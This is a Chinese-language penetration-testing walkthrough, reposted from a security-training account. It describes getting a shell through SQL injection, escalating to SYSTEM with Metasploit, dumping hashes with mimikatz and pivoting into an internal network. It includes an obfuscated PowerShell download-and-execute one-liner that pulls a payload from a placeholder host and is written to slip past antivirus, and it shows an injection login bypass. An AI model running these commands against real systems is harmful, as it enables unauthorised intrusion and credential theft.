一次从注入拿到系统权限+内网渗透

admin 2022年7月21日19:46:15安全文章评论10 views1714字阅读5分42秒阅读模式

高质量的安全文章,安全offer面试经验分享

尽在 # 掌控安全EDU #


0x00前言

这天学弟hu5k7来找我叫我帮他getshell

一次从注入拿到系统权限+内网渗透

0x01 Getshell

先登上后台看看先

一次从注入拿到系统权限+内网渗透

yunsee查看一下 iis8.5不存在解析漏洞

一次从注入拿到系统权限+内网渗透

翻后台找到了一个可以上传html的点,没什么用

后台放弃

一次从注入拿到系统权限+内网渗透

扫描目录发现网站备份源码

一次从注入拿到系统权限+内网渗透

一次从注入拿到系统权限+内网渗透


其中web.config 有账号密码,暂时没用,留着
一次从注入拿到系统权限+内网渗透


看了一下源码没发现什么地方可以利用,准备放弃了,这时候学弟说有sql注入

一次从注入拿到系统权限+内网渗透


那就上sqlmap —os-shell 看看吧
一次从注入拿到系统权限+内网渗透

普通的权限,上cs操作


powershell -w hidden -NoExit "$c1='IEX(New-ObjectNet.WebClient).Downlo';$c2='123(''http://xxxxx/bypass_test.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

这段ps代码简单混淆了一下,不加-w hidden可以过杀软

我这的bypass_test.ps1经过了免杀了


(ps免杀的工具,以前APT组织也有在用

https://github.com/danielbohannon/Invoke-Obfuscation

一次从注入拿到系统权限+内网渗透

0x02 提权

cs上线了,先看看系统补丁

一次从注入拿到系统权限+内网渗透

240个补丁,我吐了,各种exp都没用

上msf用local_exploit_suggester 让它扫一下看看有没有可以用的漏洞。

这里直接用cs可以spwn给msf 先去监听那里新建一个

一次从注入拿到系统权限+内网渗透

这里要用foreign 然后host用msf的ip,端口就msf监听的端口 我这边直接监听778

一次从注入拿到系统权限+内网渗透

然后去msf choose选择刚刚新建的监听

一次从注入拿到系统权限+内网渗透

一次从注入拿到系统权限+内网渗透

这边msf成功上线,然后用local_exploit_suggester扫描一下
一次从注入拿到系统权限+内网渗透

扫出了ms16_075,调用试一下
一次从注入拿到系统权限+内网渗透

成功返回session,getuid查看一下

一次从注入拿到系统权限+内网渗透

0x03 读取密码

直接SYSTEM,拿下,上mimikatz读取一下密码

一次从注入拿到系统权限+内网渗透

这里发现读取不到,这里是因为2012 R2以上时

默认禁止在内存缓存中保存明文密码,但是读到了hash

一次从注入拿到系统权限+内网渗透

0x04 内网渗透

本来是不打算接着操作的,但是想着都到这步了,就看看吧

之前看过不存在域。先用cs弄socks代理

一次从注入拿到系统权限+内网渗透

然后用socksCap64来添加代理
一次从注入拿到系统权限+内网渗透

然后测试一下连通性

一次从注入拿到系统权限+内网渗透

ok通了,查看一下ip然后扫一下内网服务
一次从注入拿到系统权限+内网渗透

子网掩码是255.255.255.240 那就是172.16.0.1/20
我这里用御剑的端口扫描,线程不能开太高容易死,就扫80端口先(要在刚刚的sockscap64里面添加然后在里面运行才行)

一次从注入拿到系统权限+内网渗透

扫出来了很多的80,导出来之后用test404的title获取

来获取一下网站的标题再来选目标

一次从注入拿到系统权限+内网渗透

看到了一个管理系统,然后去firefox打开用代理设置一下
一次从注入拿到系统权限+内网渗透

设置好之后就可以去访问了

一次从注入拿到系统权限+内网渗透


可以看到是个登陆的页面,可以尝试一下弱口令
一次从注入拿到系统权限+内网渗透

错误,但是发现了是thinkphp的框架,尝试使用rce
一次从注入拿到系统权限+内网渗透

rce尝试无果,发现是phpstudy,尝试phpmyadmin发现不存在

尝试使用phpstudy rce
一次从注入拿到系统权限+内网渗透

rce无果,尝试注入吧
一次从注入拿到系统权限+内网渗透

存在注入,尝试万能密码 admin’ #
一次从注入拿到系统权限+内网渗透

直接进来了,后面getshell没法绕过上传,放弃了,内网就到这吧,其他就不弄了

0x05 总结

之前提权弄了半天都没弄下来,然后找了位表哥帮忙提权了,感谢橘子表哥。

(其实之前就想到过要用这个扫描,但是懒得传msf,果然就是懒限制了我的操作)

内网思路的一些分享:注入登录的验证码是可以重复使用的,在不存在注入的情况下,其实可以爆破的。

内网渗透发现不存在域就扫一下内网其他机器的常见端口80,445,1433,3306,3389,6379等常见的端口,然后再进行渗透。




回顾往期内容

面试经验分享 — 安恒、安垚、端御#附面试题、心得

新时代的渗透思路!微服务下的信息搜集

反杀黑客 — 还敢连shell吗?蚁剑RCE第二回合~

防溯源防水表—APT渗透攻击红队行动保障

实战纪实 | 从编辑器漏洞到拿下域控300台权限

一次从注入拿到系统权限+内网渗透


 扫码加助教老师

可领取免费安全教程

一次从注入拿到系统权限+内网渗透


 还有免费的配套靶场交流群哦!



                           点击在看~好文推荐大家一起看!👇

原文始发于微信公众号(掌控安全EDU):一次从注入拿到系统权限+内网渗透

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月21日19:46:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  一次从注入拿到系统权限+内网渗透 http://cn-sec.com/archives/946548.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: